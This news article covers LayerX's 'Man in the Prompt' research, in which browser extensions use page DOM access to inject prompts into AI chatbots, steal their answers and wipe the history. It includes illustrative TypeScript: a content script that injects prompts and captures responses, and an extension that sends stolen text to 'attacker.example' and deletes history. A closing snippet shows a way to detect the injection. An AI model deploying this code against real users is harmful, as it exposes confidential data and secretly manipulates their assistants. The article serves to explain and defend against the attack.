AI chatbots: extensions can expose confidential data
LayerX researchers reveal that browser extensions make it possible to inject instructions into, and extract data from, conversations with GenAI assistants, including in professional environments presumed to be secure.
The cybersecurity company LayerX has recently highlighted an unprecedented method for compromising the confidentiality of interactions with generative artificial intelligence tools, whether commercial or developed in-house. The attack targets a vector neglected until now: browser extensions. Omnipresent in professional environments, they represent a particularly large and poorly monitored attack surface. According to LayerX, 99% of business users have extensions installed, and almost half of them have more than ten. The risk is all the greater since AI assistants are now used to handle sensitive information: source code, legal documents, HR files, business strategies, and financial reports.
Open DOM, data in danger
Called "Man in the Prompt", the flaw identified by LayerX takes advantage of how AI assistants are integrated into browsers. The prompt entry field, which allows the user to interact with models like ChatGPT, Google Gemini, or Claude, is part of the web page's DOM (Document Object Model). Any extension installed in the browser can access it, even without specific permissions. A hijacked plugin can thus inject instructions into prompts, recover the answers generated by the model, or even erase all traces of its passage by deleting the exchange history.
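To make the mechanism concrete, here is a minimal sketch of what such an extension content script could look like. The CSS selectors are hypothetical placeholders, not the assistants' real markup, and the submit-on-Enter behavior is an assumption; it is an illustration of the DOM-level access the research describes, not LayerX's actual proof of concept.

```typescript
// Hypothetical content script illustrating the "Man in the Prompt" idea.
const PROMPT_SELECTOR = "#prompt-textarea";     // assumed prompt input
const RESPONSE_SELECTOR = ".assistant-message"; // assumed response node

function injectPrompt(text: string): void {
  const field = document.querySelector<HTMLTextAreaElement>(PROMPT_SELECTOR);
  if (!field) return;
  // Write directly into the DOM node, fire an input event so the page's
  // framework notices the change, then simulate Enter to submit.
  field.value = text;
  field.dispatchEvent(new Event("input", { bubbles: true }));
  field.dispatchEvent(
    new KeyboardEvent("keydown", { key: "Enter", bubbles: true })
  );
}

// Watch the page for newly rendered assistant answers.
const observer = new MutationObserver(() => {
  const nodes = document.querySelectorAll(RESPONSE_SELECTOR);
  const last = nodes[nodes.length - 1];
  if (last?.textContent) {
    // From here, an extension could forward the text anywhere its
    // permissions allow (see the exfiltration sketch further below).
    console.log("captured response:", last.textContent);
  }
});
observer.observe(document.body, { childList: true, subtree: true });
```

Nothing in this sketch requires a special browser API: it is ordinary DOM manipulation, which is exactly why the technique is hard to distinguish from legitimate extension behavior.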
LayerX ran tests on the main GenAI chatbots on the market, including ChatGPT, Gemini, Claude, Copilot, and DeepSeek, as well as on customized internal tools. In each case, the researchers were able to demonstrate that malicious extensions could compromise exchanges with the AI. Some tools showed partial resistance, but none could completely block injection or exfiltration.
From proof of concept to concrete implications
Two exploitation scenarios illustrate the scope of this flaw. In the first, an extension queries the ChatGPT model, exfiltrates the answer, then erases the history. In the second, an extension integrated into Google Workspace exploits Gemini to extract sensitive content, such as emails, documents, or meeting minutes, even when the Gemini interface is inactive. LayerX says it informed Google of the flaw. According to the researchers, although certain protections have been added to Gemini, the specific risk linked to browser extensions remains unaddressed.
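The first scenario can be sketched as a Chrome Manifest V3 extension in two parts. The endpoint URL, the message shape, and the history markup below are hypothetical placeholders; the point is that the upload runs through the extension's own background context, outside the page's network controls.

```typescript
// content-script.ts: hand off a captured answer and hide the traces.
function stealAndClean(answer: string): void {
  // The background service worker can reach cross-origin hosts the
  // extension declares in host_permissions, so it does the upload.
  chrome.runtime.sendMessage({ type: "exfil", payload: answer });
  // Remove the rendered history entries so the injected exchange
  // disappears from the user's sidebar (assumed markup).
  document.querySelectorAll("nav li").forEach((li) => li.remove());
}

// background.ts: forward the captured text to an attacker server.
chrome.runtime.onMessage.addListener((msg: { type: string; payload: string }) => {
  if (msg.type === "exfil") {
    fetch("https://attacker.example/collect", {
      method: "POST",
      body: msg.payload,
    });
  }
});
```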
Often enriched with confidential data and deployed in environments deemed secure, internal AI assistants remain vulnerable as soon as the user's browser hosts a malicious extension. The compromise occurs locally, without crossing network boundaries, which makes the attack difficult to detect with traditional tools. Classic security solutions (DLP, CASB, or SWG types) have no visibility into manipulations carried out at the DOM level: they detect neither the injected prompts nor the data stolen on the way out.
LayerX calls for a new approach to securing generative AI tools: monitoring of DOM interactions, behavioral detection of extensions, and real-time alerts on manipulations or data leaks.
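One way to picture such DOM-level monitoring is to flag prompt-field changes that were not produced by trusted user input. The sketch below assumes the prompt area is a contenteditable element (so its text changes surface as DOM mutations) and uses a placeholder selector and threshold; it illustrates the general idea, not LayerX's product.

```typescript
// Flag prompt changes that no real keystroke can account for.
const PROMPT_SELECTOR = "#prompt-textarea"; // assumed prompt element

let lastTrustedInput = 0;

document.addEventListener(
  "input",
  (e) => {
    // isTrusted is true only for events the browser generates from real
    // user actions; synthetic events dispatched by scripts are untrusted.
    if (e.isTrusted) lastTrustedInput = Date.now();
  },
  true
);

const field = document.querySelector(PROMPT_SELECTOR);
if (field) {
  new MutationObserver(() => {
    // A mutation with no recent trusted input suggests the field was
    // rewritten programmatically, e.g. by a malicious extension.
    if (Date.now() - lastTrustedInput > 500) {
      console.warn("Prompt changed without user input: possible injection");
    }
  }).observe(field, { childList: true, characterData: true, subtree: true });
}
```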